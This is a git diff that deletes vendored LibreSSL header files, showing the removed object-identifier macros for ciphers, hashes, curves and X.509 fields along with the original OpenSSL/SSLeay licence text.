-#define NID_seed_ecb		776
-#define OBJ_seed_ecb		OBJ_kisa,1L,3L
-
-#define SN_seed_cbc		"SEED-CBC"
-#define LN_seed_cbc		"seed-cbc"
-#define NID_seed_cbc		777
-#define OBJ_seed_cbc		OBJ_kisa,1L,4L
-
-#define SN_seed_cfb128		"SEED-CFB"
-#define LN_seed_cfb128		"seed-cfb"
-#define NID_seed_cfb128		779
-#define OBJ_seed_cfb128		OBJ_kisa,1L,5L
-
-#define SN_seed_ofb128		"SEED-OFB"
-#define LN_seed_ofb128		"seed-ofb"
-#define NID_seed_ofb128		778
-#define OBJ_seed_ofb128		OBJ_kisa,1L,6L
-
-#define SN_hmac		"HMAC"
-#define LN_hmac		"hmac"
-#define NID_hmac		855
-
-#define SN_cmac		"CMAC"
-#define LN_cmac		"cmac"
-#define NID_cmac		894
-
-#define SN_rc4_hmac_md5		"RC4-HMAC-MD5"
-#define LN_rc4_hmac_md5		"rc4-hmac-md5"
-#define NID_rc4_hmac_md5		915
-
-#define SN_aes_128_cbc_hmac_sha1		"AES-128-CBC-HMAC-SHA1"
-#define LN_aes_128_cbc_hmac_sha1		"aes-128-cbc-hmac-sha1"
-#define NID_aes_128_cbc_hmac_sha1		916
-
-#define SN_aes_192_cbc_hmac_sha1		"AES-192-CBC-HMAC-SHA1"
-#define LN_aes_192_cbc_hmac_sha1		"aes-192-cbc-hmac-sha1"
-#define NID_aes_192_cbc_hmac_sha1		917
-
-#define SN_aes_256_cbc_hmac_sha1		"AES-256-CBC-HMAC-SHA1"
-#define LN_aes_256_cbc_hmac_sha1		"aes-256-cbc-hmac-sha1"
-#define NID_aes_256_cbc_hmac_sha1		918
-
-#define SN_teletrust		"teletrust"
-#define NID_teletrust		920
-#define OBJ_teletrust		OBJ_identified_organization,36L
-
-#define SN_brainpool		"brainpool"
-#define NID_brainpool		921
-#define OBJ_brainpool		OBJ_teletrust,3L,3L,2L,8L,1L
-
-#define SN_brainpoolP160r1		"brainpoolP160r1"
-#define NID_brainpoolP160r1		922
-#define OBJ_brainpoolP160r1		OBJ_brainpool,1L,1L
-
-#define SN_brainpoolP160t1		"brainpoolP160t1"
-#define NID_brainpoolP160t1		923
-#define OBJ_brainpoolP160t1		OBJ_brainpool,1L,2L
-
-#define SN_brainpoolP192r1		"brainpoolP192r1"
-#define NID_brainpoolP192r1		924
-#define OBJ_brainpoolP192r1		OBJ_brainpool,1L,3L
-
-#define SN_brainpoolP192t1		"brainpoolP192t1"
-#define NID_brainpoolP192t1		925
-#define OBJ_brainpoolP192t1		OBJ_brainpool,1L,4L
-
-#define SN_brainpoolP224r1		"brainpoolP224r1"
-#define NID_brainpoolP224r1		926
-#define OBJ_brainpoolP224r1		OBJ_brainpool,1L,5L
-
-#define SN_brainpoolP224t1		"brainpoolP224t1"
-#define NID_brainpoolP224t1		927
-#define OBJ_brainpoolP224t1		OBJ_brainpool,1L,6L
-
-#define SN_brainpoolP256r1		"brainpoolP256r1"
-#define NID_brainpoolP256r1		928
-#define OBJ_brainpoolP256r1		OBJ_brainpool,1L,7L
-
-#define SN_brainpoolP256t1		"brainpoolP256t1"
-#define NID_brainpoolP256t1		929
-#define OBJ_brainpoolP256t1		OBJ_brainpool,1L,8L
-
-#define SN_brainpoolP320r1		"brainpoolP320r1"
-#define NID_brainpoolP320r1		930
-#define OBJ_brainpoolP320r1		OBJ_brainpool,1L,9L
-
-#define SN_brainpoolP320t1		"brainpoolP320t1"
-#define NID_brainpoolP320t1		931
-#define OBJ_brainpoolP320t1		OBJ_brainpool,1L,10L
-
-#define SN_brainpoolP384r1		"brainpoolP384r1"
-#define NID_brainpoolP384r1		932
-#define OBJ_brainpoolP384r1		OBJ_brainpool,1L,11L
-
-#define SN_brainpoolP384t1		"brainpoolP384t1"
-#define NID_brainpoolP384t1		933
-#define OBJ_brainpoolP384t1		OBJ_brainpool,1L,12L
-
-#define SN_brainpoolP512r1		"brainpoolP512r1"
-#define NID_brainpoolP512r1		934
-#define OBJ_brainpoolP512r1		OBJ_brainpool,1L,13L
-
-#define SN_brainpoolP512t1		"brainpoolP512t1"
-#define NID_brainpoolP512t1		935
-#define OBJ_brainpoolP512t1		OBJ_brainpool,1L,14L
-
-#define SN_FRP256v1		"FRP256v1"
-#define NID_FRP256v1		936
-#define OBJ_FRP256v1		1L,2L,250L,1L,223L,101L,256L,1L
-
-#define SN_chacha20		"ChaCha"
-#define LN_chacha20		"chacha"
-#define NID_chacha20		937
-
-#define SN_gost89_ecb		"gost89-ecb"
-#define NID_gost89_ecb		938
-
-#define SN_gost89_cbc		"gost89-cbc"
-#define NID_gost89_cbc		939
-
-#define SN_tc26		"tc26"
-#define NID_tc26		940
-#define OBJ_tc26		OBJ_member_body,643L,7L,1L
-
-#define SN_id_tc26_gost3411_2012_256		"streebog256"
-#define LN_id_tc26_gost3411_2012_256		"GOST R 34.11-2012 (256 bit)"
-#define NID_id_tc26_gost3411_2012_256		941
-#define OBJ_id_tc26_gost3411_2012_256		OBJ_tc26,1L,2L,2L
-
-#define SN_id_tc26_gost3411_2012_512		"streebog512"
-#define LN_id_tc26_gost3411_2012_512		"GOST R 34-11-2012 (512 bit)"
-#define NID_id_tc26_gost3411_2012_512		942
-#define OBJ_id_tc26_gost3411_2012_512		OBJ_tc26,1L,2L,3L
-
-#define SN_id_tc26_gost_3410_2012_512_paramSetA		"id-tc26-gost-3410-2012-512-paramSetA"
-#define NID_id_tc26_gost_3410_2012_512_paramSetA		943
-#define OBJ_id_tc26_gost_3410_2012_512_paramSetA		OBJ_tc26,2L,1L,2L,1L
-
-#define SN_id_tc26_gost_3410_2012_512_paramSetB		"id-tc26-gost-3410-2012-512-paramSetB"
-#define NID_id_tc26_gost_3410_2012_512_paramSetB		944
-#define OBJ_id_tc26_gost_3410_2012_512_paramSetB		OBJ_tc26,2L,1L,2L,2L
-
-#define SN_id_tc26_gost_28147_param_Z		"id-tc26-gost-28147-param-Z"
-#define NID_id_tc26_gost_28147_param_Z		945
-#define OBJ_id_tc26_gost_28147_param_Z		OBJ_tc26,2L,5L,1L,1L
-
-#define SN_id_tc26_gost3410_2012_256		"id-tc26-gost3410-2012-256"
-#define LN_id_tc26_gost3410_2012_256		"GOST R 34.10-2012 (256 bit)"
-#define NID_id_tc26_gost3410_2012_256		946
-#define OBJ_id_tc26_gost3410_2012_256		OBJ_tc26,1L,1L,1L
-
-#define SN_id_tc26_gost3410_2012_512		"id-tc26-gost3410-2012-512"
-#define LN_id_tc26_gost3410_2012_512		"GOST R 34.10-2012 (512 bit)"
-#define NID_id_tc26_gost3410_2012_512		947
-#define OBJ_id_tc26_gost3410_2012_512		OBJ_tc26,1L,1L,2L
-
-#define SN_id_tc26_signwithdigest_gost3410_2012_256		"id-tc26-signwithdigest-gost3410-2012-256"
-#define LN_id_tc26_signwithdigest_gost3410_2012_256		"GOST R 34.11-2012 with GOST R 34.10-2012 (256 bit)"
-#define NID_id_tc26_signwithdigest_gost3410_2012_256		948
-#define OBJ_id_tc26_signwithdigest_gost3410_2012_256		OBJ_tc26,1L,3L,2L
-
-#define SN_id_tc26_signwithdigest_gost3410_2012_512		"id-tc26-signwithdigest-gost3410-2012-512"
-#define LN_id_tc26_signwithdigest_gost3410_2012_512		"GOST R 34.11-2012 with GOST R 34.10-2012 (512 bit)"
-#define NID_id_tc26_signwithdigest_gost3410_2012_512		949
-#define OBJ_id_tc26_signwithdigest_gost3410_2012_512		OBJ_tc26,1L,3L,3L
-
-#define SN_X25519		"X25519"
-#define NID_X25519		950
-#define OBJ_X25519		1L,3L,101L,110L
-
-#define SN_X448		"X448"
-#define NID_X448		951
-#define OBJ_X448		1L,3L,101L,111L
-
-#define SN_Ed25519		"Ed25519"
-#define NID_Ed25519		952
-#define OBJ_Ed25519		1L,3L,101L,112L
-
-#define SN_Ed448		"Ed448"
-#define NID_Ed448		953
-#define OBJ_Ed448		1L,3L,101L,113L
-
-#define SN_Ed25519ph		"Ed25519ph"
-#define NID_Ed25519ph		954
-#define OBJ_Ed25519ph		1L,3L,101L,114L
-
-#define SN_Ed448ph		"Ed448ph"
-#define NID_Ed448ph		955
-#define OBJ_Ed448ph		1L,3L,101L,115L
-
diff --git a/thirdparty/libressl/include/openssl/objects.h b/thirdparty/libressl/include/openssl/objects.h
deleted file mode 100644
index c40991b..0000000
--- a/thirdparty/libressl/include/openssl/objects.h
+++ /dev/null
@@ -1,1140 +0,0 @@
-/* $OpenBSD: objects.h,v 1.12 2017/01/21 04:53:22 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_OBJECTS_H
-#define HEADER_OBJECTS_H
-
-#define USE_OBJ_MAC
-
-#ifdef USE_OBJ_MAC
-#include <openssl/obj_mac.h>
-#else
-#define SN_undef			"UNDEF"
-#define LN_undef			"undefined"
-#define NID_undef			0
-#define OBJ_undef			0L
-
-#define SN_Algorithm			"Algorithm"
-#define LN_algorithm			"algorithm"
-#define NID_algorithm			38
-#define OBJ_algorithm			1L,3L,14L,3L,2L
-
-#define LN_rsadsi			"rsadsi"
-#define NID_rsadsi			1
-#define OBJ_rsadsi			1L,2L,840L,113549L
-
-#define LN_pkcs				"pkcs"
-#define NID_pkcs			2
-#define OBJ_pkcs			OBJ_rsadsi,1L
-
-#define SN_md2				"MD2"
-#define LN_md2				"md2"
-#define NID_md2				3
-#define OBJ_md2				OBJ_rsadsi,2L,2L
-
-#define SN_md5				"MD5"
-#define LN_md5				"md5"
-#define NID_md5				4
-#define OBJ_md5				OBJ_rsadsi,2L,5L
-
-#define SN_rc4				"RC4"
-#define LN_rc4				"rc4"
-#define NID_rc4				5
-#define OBJ_rc4				OBJ_rsadsi,3L,4L
-
-#define LN_rsaEncryption		"rsaEncryption"
-#define NID_rsaEncryption		6
-#define OBJ_rsaEncryption		OBJ_pkcs,1L,1L
-
-#define SN_md2WithRSAEncryption		"RSA-MD2"
-#define LN_md2WithRSAEncryption		"md2WithRSAEncryption"
-#define NID_md2WithRSAEncryption	7
-#define OBJ_md2WithRSAEncryption	OBJ_pkcs,1L,2L
-
-#define SN_md5WithRSAEncryption		"RSA-MD5"
-#define LN_md5WithRSAEncryption		"md5WithRSAEncryption"
-#define NID_md5WithRSAEncryption	8
-#define OBJ_md5WithRSAEncryption	OBJ_pkcs,1L,4L
-
-#define SN_pbeWithMD2AndDES_CBC		"PBE-MD2-DES"
-#define LN_pbeWithMD2AndDES_CBC		"pbeWithMD2AndDES-CBC"
-#define NID_pbeWithMD2AndDES_CBC	9
-#define OBJ_pbeWithMD2AndDES_CBC	OBJ_pkcs,5L,1L
-
-#define SN_pbeWithMD5AndDES_CBC		"PBE-MD5-DES"
-#define LN_pbeWithMD5AndDES_CBC		"pbeWithMD5AndDES-CBC"
-#define NID_pbeWithMD5AndDES_CBC	10
-#define OBJ_pbeWithMD5AndDES_CBC	OBJ_pkcs,5L,3L
-
-#define LN_X500				"X500"
-#define NID_X500			11
-#define OBJ_X500			2L,5L
-
-#define LN_X509				"X509"
-#define NID_X509			12
-#define OBJ_X509			OBJ_X500,4L
-
-#define SN_commonName			"CN"
-#define LN_commonName			"commonName"
-#define NID_commonName			13
-#define OBJ_commonName			OBJ_X509,3L
-
-#define SN_countryName			"C"
-#define LN_countryName			"countryName"
-#define NID_countryName			14
-#define OBJ_countryName			OBJ_X509,6L
-
-#define SN_localityName			"L"
-#define LN_localityName			"localityName"
-#define NID_localityName		15
-#define OBJ_localityName		OBJ_X509,7L
-
-/* Postal Address? PA */
-
-/* should be "ST" (rfc1327) but MS uses 'S' */
-#define SN_stateOrProvinceName		"ST"
-#define LN_stateOrProvinceName		"stateOrProvinceName"
-#define NID_stateOrProvinceName		16
-#define OBJ_stateOrProvinceName		OBJ_X509,8L
-
-#define SN_organizationName		"O"
-#define LN_organizationName		"organizationName"
-#define NID_organizationName		17
-#define OBJ_organizationName		OBJ_X509,10L
-
-#define SN_organizationalUnitName	"OU"
-#define LN_organizationalUnitName	"organizationalUnitName"
-#define NID_organizationalUnitName	18
-#define OBJ_organizationalUnitName	OBJ_X509,11L
-
-#define SN_rsa				"RSA"
-#define LN_rsa				"rsa"
-#define NID_rsa				19
-#define OBJ_rsa				OBJ_X500,8L,1L,1L
-
-#define LN_pkcs7			"pkcs7"
-#define NID_pkcs7			20
-#define OBJ_pkcs7			OBJ_pkcs,7L
-
-#define LN_pkcs7_data			"pkcs7-data"
-#define NID_pkcs7_data			21
-#define OBJ_pkcs7_data			OBJ_pkcs7,1L
-
-#define LN_pkcs7_signed			"pkcs7-signedData"
-#define NID_pkcs7_signed		22
-#define OBJ_pkcs7_signed		OBJ_pkcs7,2L
-
-#define LN_pkcs7_enveloped		"pkcs7-envelopedData"
-#define NID_pkcs7_enveloped		23
-#define OBJ_pkcs7_enveloped		OBJ_pkcs7,3L
-
-#define LN_pkcs7_signedAndEnveloped	"pkcs7-signedAndEnvelopedData"
-#define NID_pkcs7_signedAndEnveloped	24
-#define OBJ_pkcs7_signedAndEnveloped	OBJ_pkcs7,4L
-
-#define LN_pkcs7_digest			"pkcs7-digestData"
-#define NID_pkcs7_digest		25
-#define OBJ_pkcs7_digest		OBJ_pkcs7,5L
-
-#define LN_pkcs7_encrypted		"pkcs7-encryptedData"
-#define NID_pkcs7_encrypted		26
-#define OBJ_pkcs7_encrypted		OBJ_pkcs7,6L
-
-#define LN_pkcs3			"pkcs3"
-#define NID_pkcs3			27
-#define OBJ_pkcs3			OBJ_pkcs,3L
-
-#define LN_dhKeyAgreement		"dhKeyAgreement"
-#define NID_dhKeyAgreement		28
-#define OBJ_dhKeyAgreement		OBJ_pkcs3,1L
-
-#define SN_des_ecb			"DES-ECB"
-#define LN_des_ecb			"des-ecb"
-#define NID_des_ecb			29
-#define OBJ_des_ecb			OBJ_algorithm,6L
-
-#define SN_des_cfb64			"DES-CFB"
-#define LN_des_cfb64			"des-cfb"
-#define NID_des_cfb64			30
-/* IV + num */
-#define OBJ_des_cfb64			OBJ_algorithm,9L
-
-#define SN_des_cbc			"DES-CBC"
-#define LN_des_cbc			"des-cbc"
-#define NID_des_cbc			31
-/* IV */
-#define OBJ_des_cbc			OBJ_algorithm,7L
-
-#define SN_des_ede			"DES-EDE"
-#define LN_des_ede			"des-ede"
-#define NID_des_ede			32
-/* ?? */
-#define OBJ_des_ede			OBJ_algorithm,17L
-
-#define SN_des_ede3			"DES-EDE3"
-#define LN_des_ede3			"des-ede3"
-#define NID_des_ede3			33
-
-#define SN_idea_cbc			"IDEA-CBC"
-#define LN_idea_cbc			"idea-cbc"
-#define NID_idea_cbc			34
-#define OBJ_idea_cbc			1L,3L,6L,1L,4L,1L,188L,7L,1L,1L,2L
-
-#define SN_idea_cfb64			"IDEA-CFB"
-#define LN_idea_cfb64			"idea-cfb"
-#define NID_idea_cfb64			35
-
-#define SN_idea_ecb			"IDEA-ECB"
-#define LN_idea_ecb			"idea-ecb"
-#define NID_idea_ecb			36
-
-#define SN_rc2_cbc			"RC2-CBC"
-#define LN_rc2_cbc			"rc2-cbc"
-#define NID_rc2_cbc			37
-#define OBJ_rc2_cbc			OBJ_rsadsi,3L,2L
-
-#define SN_rc2_ecb			"RC2-ECB"
-#define LN_rc2_ecb			"rc2-ecb"
-#define NID_rc2_ecb			38
-
-#define SN_rc2_cfb64			"RC2-CFB"
-#define LN_rc2_cfb64			"rc2-cfb"
-#define NID_rc2_cfb64			39
-
-#define SN_rc2_ofb64			"RC2-OFB"
-#define LN_rc2_ofb64			"rc2-ofb"
-#define NID_rc2_ofb64			40
-
-#define SN_sha				"SHA"
-#define LN_sha				"sha"
-#define NID_sha				41
-#define OBJ_sha				OBJ_algorithm,18L
-
-#define SN_shaWithRSAEncryption		"RSA-SHA"
-#define LN_shaWithRSAEncryption		"shaWithRSAEncryption"
-#define NID_shaWithRSAEncryption	42
-#define OBJ_shaWithRSAEncryption	OBJ_algorithm,15L
-
-#define SN_des_ede_cbc			"DES-EDE-CBC"
-#define LN_des_ede_cbc			"des-ede-cbc"
-#define NID_des_ede_cbc			43
-
-#define SN_des_ede3_cbc			"DES-EDE3-CBC"
-#define LN_des_ede3_cbc			"des-ede3-cbc"
-#define NID_des_ede3_cbc		44
-#define OBJ_des_ede3_cbc		OBJ_rsadsi,3L,7L
-
-#define SN_des_ofb64			"DES-OFB"
-#define LN_des_ofb64			"des-ofb"
-#define NID_des_ofb64			45
-#define OBJ_des_ofb64			OBJ_algorithm,8L
-
-#define SN_idea_ofb64			"IDEA-OFB"
-#define LN_idea_ofb64			"idea-ofb"
-#define NID_idea_ofb64			46
-
-#define LN_pkcs9			"pkcs9"
-#define NID_pkcs9			47
-#define OBJ_pkcs9			OBJ_pkcs,9L
-
-#define SN_pkcs9_emailAddress		"Email"
-#define LN_pkcs9_emailAddress		"emailAddress"
-#define NID_pkcs9_emailAddress		48
-#define OBJ_pkcs9_emailAddress		OBJ_pkcs9,1L
-
-#define LN_pkcs9_unstructuredName	"unstructuredName"
-#define NID_pkcs9_unstructuredName	49
-#define OBJ_pkcs9_unstructuredName	OBJ_pkcs9,2L
-
-#define LN_pkcs9_contentType		"contentType"
-#define NID_pkcs9_contentType		50
-#define OBJ_pkcs9_contentType		OBJ_pkcs9,3L
-
-#define LN_pkcs9_messageDigest		"messageDigest"
-#define NID_pkcs9_messageDigest		51
-#define OBJ_pkcs9_messageDigest		OBJ_pkcs9,4L
-
-#define LN_pkcs9_signingTime		"signingTime"
-#define NID_pkcs9_signingTime		52
-#define OBJ_pkcs9_signingTime		OBJ_pkcs9,5L
-
-#define LN_pkcs9_countersignature	"countersignature"
-#define NID_pkcs9_countersignature	53
-#define OBJ_pkcs9_countersignature	OBJ_pkcs9,6L
-
-#define LN_pkcs9_challengePassword	"challengePassword"
-#define NID_pkcs9_challengePassword	54
-#define OBJ_pkcs9_challengePassword	OBJ_pkcs9,7L
-
-#define LN_pkcs9_unstructuredAddress	"unstructuredAddress"
-#define NID_pkcs9_unstructuredAddress	55
-#define OBJ_pkcs9_unstructuredAddress	OBJ_pkcs9,8L
-
-#define LN_pkcs9_extCertAttributes	"extendedCertificateAttributes"
-#define NID_pkcs9_extCertAttributes	56
-#define OBJ_pkcs9_extCertAttributes	OBJ_pkcs9,9L
-
-#define SN_netscape			"Netscape"
-#define LN_netscape			"Netscape Communications Corp."
-#define NID_netscape			57
-#define OBJ_netscape			2L,16L,840L,1L,113730L
-
-#define SN_netscape_cert_extension	"nsCertExt"
-#define LN_netscape_cert_extension	"Netscape Certificate Extension"
-#define NID_netscape_cert_extension	58
-#define OBJ_netscape_cert_extension	OBJ_netscape,1L
-
-#define SN_netscape_data_type		"nsDataType"
-#define LN_netscape_data_type		"Netscape Data Type"
-#define NID_netscape_data_type		59
-#define OBJ_netscape_data_type		OBJ_netscape,2L
-
-#define SN_des_ede_cfb64		"DES-EDE-CFB"
-#define LN_des_ede_cfb64		"des-ede-cfb"
-#define NID_des_ede_cfb64		60
-
-#define SN_des_ede3_cfb64		"DES-EDE3-CFB"
-#define LN_des_ede3_cfb64		"des-ede3-cfb"
-#define NID_des_ede3_cfb64		61
-
-#define SN_des_ede_ofb64		"DES-EDE-OFB"
-#define LN_des_ede_ofb64		"des-ede-ofb"
-#define NID_des_ede_ofb64		62
-
-#define SN_des_ede3_ofb64		"DES-EDE3-OFB"
-#define LN_des_ede3_ofb64		"des-ede3-ofb"
-#define NID_des_ede3_ofb64		63
-
-/* I'm not sure about the object ID */
-#define SN_sha1				"SHA1"
-#define LN_sha1				"sha1"
-#define NID_sha1			64
-#define OBJ_sha1			OBJ_algorithm,26L
-/* 28 Jun 1996 - eay */
-/* #define OBJ_sha1			1L,3L,14L,2L,26L,05L <- wrong */
-
-#define SN_sha1WithRSAEncryption	"RSA-SHA1"
-#define LN_sha1WithRSAEncryption	"sha1WithRSAEncryption"
-#define NID_sha1WithRSAEncryption	65
-#define OBJ_sha1WithRSAEncryption	OBJ_pkcs,1L,5L
-
-#define SN_dsaWithSHA			"DSA-SHA"
-#define LN_dsaWithSHA			"dsaWithSHA"
-#define NID_dsaWithSHA			66
-#define OBJ_dsaWithSHA			OBJ_algorithm,13L
-
-#define SN_dsa_2			"DSA-old"
-#define LN_dsa_2			"dsaEncryption-old"
-#define NID_dsa_2			67
-#define OBJ_dsa_2			OBJ_algorithm,12L
-
-/* proposed by microsoft to RSA */
-#define SN_pbeWithSHA1AndRC2_CBC	"PBE-SHA1-RC2-64"
-#define LN_pbeWithSHA1AndRC2_CBC	"pbeWithSHA1AndRC2-CBC"
-#define NID_pbeWithSHA1AndRC2_CBC	68
-#define OBJ_pbeWithSHA1AndRC2_CBC	OBJ_pkcs,5L,11L
-
-/* proposed by microsoft to RSA as pbeWithSHA1AndRC4: it is now
- * defined explicitly in PKCS#5 v2.0 as id-PBKDF2 which is something
- * completely different.
- */
-#define LN_id_pbkdf2			"PBKDF2"
-#define NID_id_pbkdf2			69
-#define OBJ_id_pbkdf2			OBJ_pkcs,5L,12L
-
-#define SN_dsaWithSHA1_2		"DSA-SHA1-old"
-#define LN_dsaWithSHA1_2		"dsaWithSHA1-old"
-#define NID_dsaWithSHA1_2		70
-/* Got this one from 'sdn706r20.pdf' which is actually an NSA document :-) */
-#define OBJ_dsaWithSHA1_2		OBJ_algorithm,27L
-
-#define SN_netscape_cert_type		"nsCertType"
-#define LN_netscape_cert_type		"Netscape Cert Type"
-#define NID_netscape_cert_type		71
-#define OBJ_netscape_cert_type		OBJ_netscape_cert_extension,1L
-
-#define SN_netscape_base_url		"nsBaseUrl"
-#define LN_netscape_base_url		"Netscape Base Url"
-#define NID_netscape_base_url		72
-#define OBJ_netscape_base_url		OBJ_netscape_cert_extension,2L
-
-#define SN_netscape_revocation_url	"nsRevocationUrl"
-#define LN_netscape_revocation_url	"Netscape Revocation Url"
-#define NID_netscape_revocation_url	73
-#define OBJ_netscape_revocation_url	OBJ_netscape_cert_extension,3L
-
-#define SN_netscape_ca_revocation_url	"nsCaRevocationUrl"
-#define LN_netscape_ca_revocation_url	"Netscape CA Revocation Url"
-#define NID_netscape_ca_revocation_url	74
-#define OBJ_netscape_ca_revocation_url	OBJ_netscape_cert_extension,4L
-
-#define SN_netscape_renewal_url		"nsRenewalUrl"
-#define LN_netscape_renewal_url		"Netscape Renewal Url"
-#define NID_netscape_renewal_url	75
-#define OBJ_netscape_renewal_url	OBJ_netscape_cert_extension,7L
-
-#define SN_netscape_ca_policy_url	"nsCaPolicyUrl"
-#define LN_netscape_ca_policy_url	"Netscape CA Policy Url"
-#define NID_netscape_ca_policy_url	76
-#define OBJ_netscape_ca_policy_url	OBJ_netscape_cert_extension,8L
-
-#define SN_netscape_ssl_server_name	"nsSslServerName"
-#define LN_netscape_ssl_server_name	"Netscape SSL Server Name"
-#define NID_netscape_ssl_server_name	77
-#define OBJ_netscape_ssl_server_name	OBJ_netscape_cert_extension,12L
-
-#define SN_netscape_comment		"nsComment"
-#define LN_netscape_comment		"Netscape Comment"
-#define NID_netscape_comment		78
-#define OBJ_netscape_comment		OBJ_netscape_cert_extension,13L
-
-#define SN_netscape_cert_sequence	"nsCertSequence"
-#define LN_netscape_cert_sequence	"Netscape Certificate Sequence"
-#define NID_netscape_cert_sequence	79
-#define OBJ_netscape_cert_sequence	OBJ_netscape_data_type,5L
-
-#define SN_desx_cbc			"DESX-CBC"
-#define LN_desx_cbc			"desx-cbc"
-#define NID_desx_cbc			80
-
-#define SN_id_ce			"id-ce"
-#define NID_id_ce			81
-#define OBJ_id_ce			2L,5L,29L
-
-#define SN_subject_key_identifier	"subjectKeyIdentifier"
-#define LN_subject_key_identifier	"X509v3 Subject Key Identifier"
-#define NID_subject_key_identifier	82
-#define OBJ_subject_key_identifier	OBJ_id_ce,14L
-
-#define SN_key_usage			"keyUsage"
-#define LN_key_usage			"X509v3 Key Usage"
-#define NID_key_usage			83
-#define OBJ_key_usage			OBJ_id_ce,15L
-
-#define SN_private_key_usage_period	"privateKeyUsagePeriod"
-#define LN_private_key_usage_period	"X509v3 Private Key Usage Period"
-#define NID_private_key_usage_period	84
-#define OBJ_private_key_usage_period	OBJ_id_ce,16L
-
-#define SN_subject_alt_name		"subjectAltName"
-#define LN_subject_alt_name		"X509v3 Subject Alternative Name"
-#define NID_subject_alt_name		85
-#define OBJ_subject_alt_name		OBJ_id_ce,17L
-
-#define SN_issuer_alt_name		"issuerAltName"
-#define LN_issuer_alt_name		"X509v3 Issuer Alternative Name"
-#define NID_issuer_alt_name		86
-#define OBJ_issuer_alt_name		OBJ_id_ce,18L
-
-#define SN_basic_constraints		"basicConstraints"
-#define LN_basic_constraints		"X509v3 Basic Constraints"
-#define NID_basic_constraints		87
-#define OBJ_basic_constraints		OBJ_id_ce,19L
-
-#define SN_crl_number			"crlNumber"
-#define LN_crl_number			"X509v3 CRL Number"
-#define NID_crl_number			88
-#define OBJ_crl_number			OBJ_id_ce,20L
-
-#define SN_certificate_policies		"certificatePolicies"
-#define LN_certificate_policies		"X509v3 Certificate Policies"
-#define NID_certificate_policies	89
-#define OBJ_certificate_policies	OBJ_id_ce,32L
-
-#define SN_authority_key_identifier	"authorityKeyIdentifier"
-#define LN_authority_key_identifier	"X509v3 Authority Key Identifier"
-#define NID_authority_key_identifier	90
-#define OBJ_authority_key_identifier	OBJ_id_ce,35L
-
-#define SN_bf_cbc			"BF-CBC"
-#define LN_bf_cbc			"bf-cbc"
-#define NID_bf_cbc			91
-#define OBJ_bf_cbc			1L,3L,6L,1L,4L,1L,3029L,1L,2L
-
-#define SN_bf_ecb			"BF-ECB"
-#define LN_bf_ecb			"bf-ecb"
-#define NID_bf_ecb			92
-
-#define SN_bf_cfb64			"BF-CFB"
-#define LN_bf_cfb64			"bf-cfb"
-#define NID_bf_cfb64			93
-
-#define SN_bf_ofb64			"BF-OFB"
-#define LN_bf_ofb64			"bf-ofb"
-#define NID_bf_ofb64			94
-
-#define SN_mdc2				"MDC2"
-#define LN_mdc2				"mdc2"
-#define NID_mdc2			95
-#define OBJ_mdc2			2L,5L,8L,3L,101L
-/* An alternative?			1L,3L,14L,3L,2L,19L */
-
-#define SN_mdc2WithRSA			"RSA-MDC2"
-#define LN_mdc2WithRSA			"mdc2withRSA"
-#define NID_mdc2WithRSA			96
-#define OBJ_mdc2WithRSA			2L,5L,8L,3L,100L
-
-#define SN_rc4_40			"RC4-40"
-#define LN_rc4_40			"rc4-40"
-#define NID_rc4_40			97
-
-#define SN_rc2_40_cbc			"RC2-40-CBC"
-#define LN_rc2_40_cbc			"rc2-40-cbc"
-#define NID_rc2_40_cbc			98
-
-#define SN_givenName			"G"
-#define LN_givenName			"givenName"
-#define NID_givenName			99
-#define OBJ_givenName			OBJ_X509,42L
-
-#define SN_surname			"S"
-#define LN_surname			"surname"
-#define NID_surname			100
-#define OBJ_surname			OBJ_X509,4L
-
-#define SN_initials			"I"
-#define LN_initials			"initials"
-#define NID_initials			101
-#define OBJ_initials			OBJ_X509,43L
-
-#define SN_uniqueIdentifier		"UID"
-#define LN_uniqueIdentifier		"uniqueIdentifier"
-#define NID_uniqueIdentifier		102
